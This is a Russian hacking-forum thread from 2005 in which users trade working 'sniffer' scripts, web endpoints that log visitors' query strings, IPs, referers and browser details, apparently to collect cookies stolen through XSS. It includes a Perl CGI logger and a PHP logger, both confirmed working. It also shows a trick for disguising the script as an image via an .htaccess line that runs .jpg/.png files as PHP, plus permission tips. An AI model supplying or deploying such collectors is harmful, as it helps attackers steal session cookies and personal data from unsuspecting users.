Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Все тот же сниффер. (https://forum.antichat.xyz/showthread.php?t=5276)

Zingara 01.03.2005 04:49
Все тот же сниффер.
 
Господа!

Раз из - за глюка все сообщения пропали, то повторно прошу о помощи... Помогите пожалуйста правильно подписаться на сниффер, чтобы на мыло приходили логи!

Слёзно вас молю!

a33 01.03.2005 16:48
вот те ссылка на твой рабочий сниффер: http://a2systems.fatal.ru/logo/log.html

KEZ 01.03.2005 16:52
На web-hack вроде ещё есть.
МНЕ ЛИЧНО ПРИХОДЯТ ЛОГИ с античатовского снифера

rsha1988 01.03.2005 21:39
Цитата:
Сообщение от a33
вот те ссылка на твой рабочий сниффер: http://a2systems.fatal.ru/logo/log.html
Слушай, скажи как ты сниффер установил?
Пробывал на фатале и не фига не вышла (на другом хосте тож пробывал).
Или это не рабочий сниффер?:

Код:
#!/usr/bin/perl

#путь к лог-файлу
$LogFile="log.txt";
#максимальное число записей в лог-файле
$mlength=50;

#делаем редирект на картинку
print "Location: image.gif\n\n";

#читаем CGI запрос
read(STDIN, $input, $ENV{'CONTENT_LENGTH'});
$input = $ENV{'QUERY_STRING'} if $ENV{'QUERY_STRING'};
$input =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

#получаем время запроса и HTTP_REFERER
$now_string = localtime;
$ref = $ENV{'HTTP_REFERER'};

#читаем лог-файл в массив
open (LOG,"$LogFile") || die "Can't Open $LogFile: $!\n";
@LOGtext=<LOG>;
close (LOG);

#открываем на запись лог
open (LOG, ">$LogFile");

#сохраняем данные запроса
print LOG "[$now_string] IP=$ENV{'REMOTE_ADDR'} REFERER=$ref QUERY=$input\n";

#сохраняем остальные логи, так что бы длина лог-файла не превышала mlength
$counter=1;
foreach $LOGitem (@LOGtext)
{
if ($counter<$mlength){ print LOG "$LOGitem"; };
$counter++;
};

#закрываем лог
close (LOG);

exit;
:confused:

(-=util=-) 01.03.2005 22:21
как я уже сам убедился снифер на бесплатном хостинге практически бесполезен. Только рефери ты сможешь найти это раз.... Два это то чно снифер лучше делать на php... вроде мароки меньше. может я и неправ. могу дать рабочий снифер на php исходник свой....

KEZ 01.03.2005 22:26
Только как ты не бесплатном хостинге заставиш апач передавать управление php (или perl) для расширения jpg. А если НЕ маскировать под картинку то смысла нет... ИМХО фильтрация работает

rsha1988 01.03.2005 22:33
Цитата:
Сообщение от (-=util=-)
могу дать рабочий снифер на php исходник свой....
Давай!

rsha1988 01.03.2005 22:35
У меня и платный хост есть и вот что мне там пишет:

Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, webmaster@ and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

(-=util=-) 01.03.2005 23:07
rsha1988 вот лови... то что у меня получилось... может пригодится... :)
PHP код:
<?php
$date=date("[D|d/m/Y|H:i]");
$ip=$_SERVER["REMOTE_ADDR"];
$query=$_SERVER["QUERY_STRING"];
$real_ip=getenv("HTTP_X_FORWARDED_FOR");
$otkuda=getenv("HTTP_REFERER");
$browser=getenv("HTTP_USER_AGENT");
$win=getenv("windir");
$fp=fopen("log.html","a");
fputs($fp,"<font color=#009900><b>Date:</b> $date</font>\t|$uid|\t<font color=red><b>IP:</b> $ip <b>Real IP(if use proxy):</b>($real_ip)</font><br>\t$query\t$browser\t$otkuda\t$win\n<hr color=#666666>");
fclose($fp);
print (" <img src='2.jpg'> ");
?>
В каталог со снифером брось картинку 2.jpg
Лог будет в файле
log.html

KEZ 01.03.2005 23:14
И что ты думаеш, сервак ее будет компилировать как php?
Он просто передаст содержимое браузеру!

rsha1988 01.03.2005 23:46
Ура!
Работает!
Большое спасибо (-=util=-)!

rsha1988 02.03.2005 00:24
Правла идинственное плохо что логи в нис идут

(-=util=-) 02.03.2005 01:03
KEZ, Нет.... я же сказал что на php.... элементарный исходник.

a33 04.03.2005 13:22
to all,сниффер на php похожий на сниффер (-=util=-)
ну типа 2 в одном: подпись и сниф:)
http://a2systems.fatal.ru/logo/a2tktsnif.jpg
смотреть Лог:http://a2systems.fatal.ru/logo/log.html
Как видите хостинг на fatal.ru
поддержка ".htaccess".содержание
AddType application/x-httpd-php .png
или
AddType application/x-httpd-php .jpg
вот и всё

coyl 04.03.2005 13:30
2 KEZ
я то думал ты мега прошарен в этих делах, а ты даже не знаешь, что пхп транслируется серваком при любом обращении =)
если бы сервак передавал нетранслировнный пхп файл, то можно было бы ломать форумы на раз. config.php... =)))

coyl 04.03.2005 13:34
кстати, еще с месяц назад выкладывал здесь похожий исходник.

(-=util=-) 04.03.2005 15:45
a33, у тебя исходник как и у меня ведь? Только ".htaccess" Добавлял? Я неособо в этом рублю... :) Что смог то сделал))

(-=util=-) 04.03.2005 15:59
a33, вопрос снят. Пасиба за инфу.
аааа ... вот ещё вопрос... какой лучше chmod выставлять выполняещиму скрипту и логу ?

KEZ 04.03.2005 17:29
Скрипту в любом случае Execute (смотри какие числа)
А логам только Write

KEZ 04.03.2005 17:31
логам 771
а скриптам 660

coyl 04.03.2005 19:36
кстати нифига.
скрипт если ПХПшный, то можно и просто чтение поставить. но ваще-та без разницы (Только для пхп и асп)

KEZ 04.03.2005 21:09
Вообщето главное чтобы у Cgi был Execute

summi 03.10.2009 09:43
на злом поищите вроде есть*

summi 03.10.2009 14:51
0о) ебать а мне приходил спам


Время: 01:21